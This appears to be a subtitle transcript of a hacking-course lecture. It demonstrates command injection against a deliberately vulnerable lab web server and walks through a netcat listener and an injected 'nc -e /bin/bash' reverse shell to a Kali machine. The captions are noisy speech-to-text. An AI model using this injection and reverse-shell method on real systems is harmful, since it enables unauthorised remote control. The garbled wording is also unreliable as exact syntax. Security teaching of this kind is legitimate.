1
00:00:00,300 --> 00:00:01,140
Hello everybody.

2
00:00:01,140 --> 00:00:02,050
Welcome back.

3
00:00:02,050 --> 00:00:07,080
And let us continue with exploiting our command execution more ability.

4
00:00:07,170 --> 00:00:13,530
So in the previous video we basically tried out this Web server by typing in our IP address and then

5
00:00:13,560 --> 00:00:17,180
typing in another comment to see if it will execute it.

6
00:00:17,190 --> 00:00:21,490
Now you divide two terminal commands with dot and comma.

7
00:00:21,690 --> 00:00:24,480
I can assure you that it works in your terminal as well.

8
00:00:24,480 --> 00:00:26,100
So if you type here I have config.

9
00:00:26,970 --> 00:00:29,330
And then dot comma and then who am I.

10
00:00:29,330 --> 00:00:37,070
It will basically print out the config output and also it will print the whole my output.

11
00:00:37,470 --> 00:00:39,720
So you can do a bunch of the commands like that.

12
00:00:39,720 --> 00:00:40,860
So I have config.

13
00:00:40,860 --> 00:00:42,170
Who am I.

14
00:00:42,870 --> 00:00:48,120
And it will print out all of these commands with their output as we can see.

15
00:00:48,570 --> 00:00:55,020
So now that we know that we need to find the best way to use this vulnerability in order for us to gain

16
00:00:55,050 --> 00:01:04,090
access to that machine so let us try out to see for example if we type one end to the 160 that one that

17
00:01:04,110 --> 00:01:17,160
one and then for example you name minus K let's see if it will execute that and as we can see it does

18
00:01:17,160 --> 00:01:17,750
execute it.

19
00:01:17,790 --> 00:01:25,890
It gives us the version of Linux and the name as we can see always BW A I now know that we know that

20
00:01:26,010 --> 00:01:28,710
we need to we can certainly do better than this.

21
00:01:28,710 --> 00:01:30,270
And then just gathering information.

22
00:01:30,270 --> 00:01:37,870
Command by command we can actually try to make a connection with this machine to our own machine.

23
00:01:38,010 --> 00:01:43,480
Now in order for us to do that we will use a tool called Net cat.

24
00:01:43,620 --> 00:01:52,420
Now net cat is basically just let me just clear the screen with net cat.

25
00:01:52,460 --> 00:02:00,680
We can actually connect to another P.C. with just two simple commands which for our own P.C. we need

26
00:02:00,680 --> 00:02:08,030
to set up the listening port and that listening port for our example will be one two three four five.

27
00:02:08,060 --> 00:02:15,310
Now on the listening port we will listen for the inter coming connection from any P.C..

28
00:02:15,500 --> 00:02:22,490
And in this case that P.C. will be our memorable O W to a machine since we will run the command in its

29
00:02:22,550 --> 00:02:26,120
own terminal since it is vulnerable to a command execution.

30
00:02:26,120 --> 00:02:27,580
So here we want to type here.

31
00:02:27,590 --> 00:02:32,260
This command and C and then minus LV BP.

32
00:02:32,390 --> 00:02:34,640
One two three four five.

33
00:02:34,650 --> 00:02:38,950
Now if you want to check out before running that if you want to check out some of the options to just

34
00:02:38,960 --> 00:02:46,670
see what is the syntax here you can see what our P stands for and you can see also some of the other

35
00:02:46,670 --> 00:02:53,390
options here as you can see minus L stands for listen mode for inbound connections we will use that

36
00:02:53,870 --> 00:03:00,260
minus three stands for both use tries to be more verbose we also use that and minus p let me just find

37
00:03:00,260 --> 00:03:07,130
it is port so we specify the port to be one two three four five you can specify any port as long as

38
00:03:07,130 --> 00:03:15,530
it is not in use so but in this case I will use and C minus l BP for a listen verbose and port and port

39
00:03:15,530 --> 00:03:17,480
number one two three four five.

40
00:03:17,660 --> 00:03:23,480
Now if you run this it will say listening on any one two three four five this any means on any interface

41
00:03:23,660 --> 00:03:25,100
on any networking interface.

42
00:03:25,700 --> 00:03:31,970
So once we receive the connection we will be able to execute commands to divert the machine from here

43
00:03:32,270 --> 00:03:42,090
to the victim machine from here so let us just open up our Firefox and now what we want to do is make

44
00:03:42,090 --> 00:03:49,450
these machine connect to our Cal Linux machine we knew that so we can simply type one to that once 160

45
00:03:49,500 --> 00:03:54,600
that one that one suite performs the pinging of that machine and then we put the dot and comma in order

46
00:03:54,600 --> 00:04:05,530
to run our next command which will be and see traditional and c dot and then traditional and then minus

47
00:04:05,540 --> 00:04:14,480
key and then we want to go to the bin bash in order folder in the victim machine.

48
00:04:14,780 --> 00:04:20,480
And after that we want to specify the IP address of our clinic's machine.

49
00:04:20,840 --> 00:04:26,230
So this will basically mean the two to which machine should it connect.

50
00:04:26,390 --> 00:04:30,320
And we wanted to connect to our clinic's machine.

51
00:04:30,420 --> 00:04:35,440
Now in order for me to check that you just type your config so I don't specify wrong port.

52
00:04:35,450 --> 00:04:39,110
So we want to connect to this port from the victim machine.

53
00:04:39,170 --> 00:04:42,320
Pardon me for this IP address from the victim machine.

54
00:04:42,320 --> 00:04:48,200
So we type here our clinic's IP address and then we type the port that we are listening on which is

55
00:04:48,200 --> 00:04:49,460
one two three four five.

56
00:04:49,460 --> 00:04:55,790
In my case if you specified any other port just type here that port after the IP address of the clinic's

57
00:04:55,790 --> 00:04:56,660
machine.

58
00:04:56,690 --> 00:05:02,720
Now what this command will do is first of all it will ping the hour outer and then it will execute the

59
00:05:02,720 --> 00:05:08,840
next command which is netiquette and it will connect to our carrier Linux machine on this port.

60
00:05:09,940 --> 00:05:14,020
And this bin bash basically allows us to execute commands on that machine.

61
00:05:14,090 --> 00:05:20,720
So if we type here submit you will notice that it basically will just being I believe it won't give

62
00:05:20,750 --> 00:05:24,540
any output right here or maybe it will just stay here loading.

63
00:05:24,540 --> 00:05:26,500
Let's check that out.

64
00:05:26,500 --> 00:05:32,860
Yeah it will probably stay here loading but if we open our terminal you can see connect to 192 that

65
00:05:32,860 --> 00:05:38,710
168 that one that 5 which is us from 192 that 168 that's six.

66
00:05:38,710 --> 00:05:44,230
We can see that someone has connected to our listening port and it is basically it.

67
00:05:44,230 --> 00:05:49,120
It won't say anything it will just give you this output and it will wait for something.

68
00:05:49,120 --> 00:05:52,150
Now what it waits for is the command ship retype here.

69
00:05:52,150 --> 00:05:55,870
Who am I Mike perhaps or am I.

70
00:05:55,870 --> 00:06:04,210
You will see that we get the output BBB minus data type here you name minus I we can see that we are

71
00:06:04,210 --> 00:06:09,860
currently running commands on the Linux system on the our victim system.

72
00:06:09,880 --> 00:06:17,230
We made a reverse connection we made it connect to our own Cal Linux machine which basically means we

73
00:06:17,230 --> 00:06:18,120
exploited it.

74
00:06:18,130 --> 00:06:24,910
Since now we can type here else in order to see files we can change directory and type palace here again

75
00:06:25,360 --> 00:06:28,930
and we can see all of the files on that machine.

76
00:06:28,930 --> 00:06:32,800
We can also check the I.P. address so you can see that it really is that machine.

77
00:06:32,790 --> 00:06:42,320
So if it out here has been and then slash have config it will say that the IP address is 192 that 168

78
00:06:42,320 --> 00:06:47,190
that one that 6 which is the IP address of our victim machine.

79
00:06:47,450 --> 00:06:56,090
And I will show you that if I type right here I have config you can see that the IP addresses do match

80
00:06:56,140 --> 00:06:57,310
my right to the weapons here.

81
00:06:57,310 --> 00:07:07,030
The six and 192 that once said that 1 that 6 so that's about it for this exploitation of the command

82
00:07:07,030 --> 00:07:07,840
injection.

83
00:07:07,840 --> 00:07:12,780
You can basically now navigate your way and then try to find something useful.

84
00:07:12,790 --> 00:07:17,590
If this was a real machine but since this is perhaps the most vulnerable machine I wouldn't be actually

85
00:07:17,890 --> 00:07:25,450
trying to find something right here since I know there really isn't anything special and in the next

86
00:07:25,450 --> 00:07:29,440
lecture I will show you how you can actually do the same thing.

87
00:07:29,500 --> 00:07:36,040
But on the blind command injection now I will explain what blind command ejection is in the next material

88
00:07:36,070 --> 00:07:37,990
and I hope I see you there by.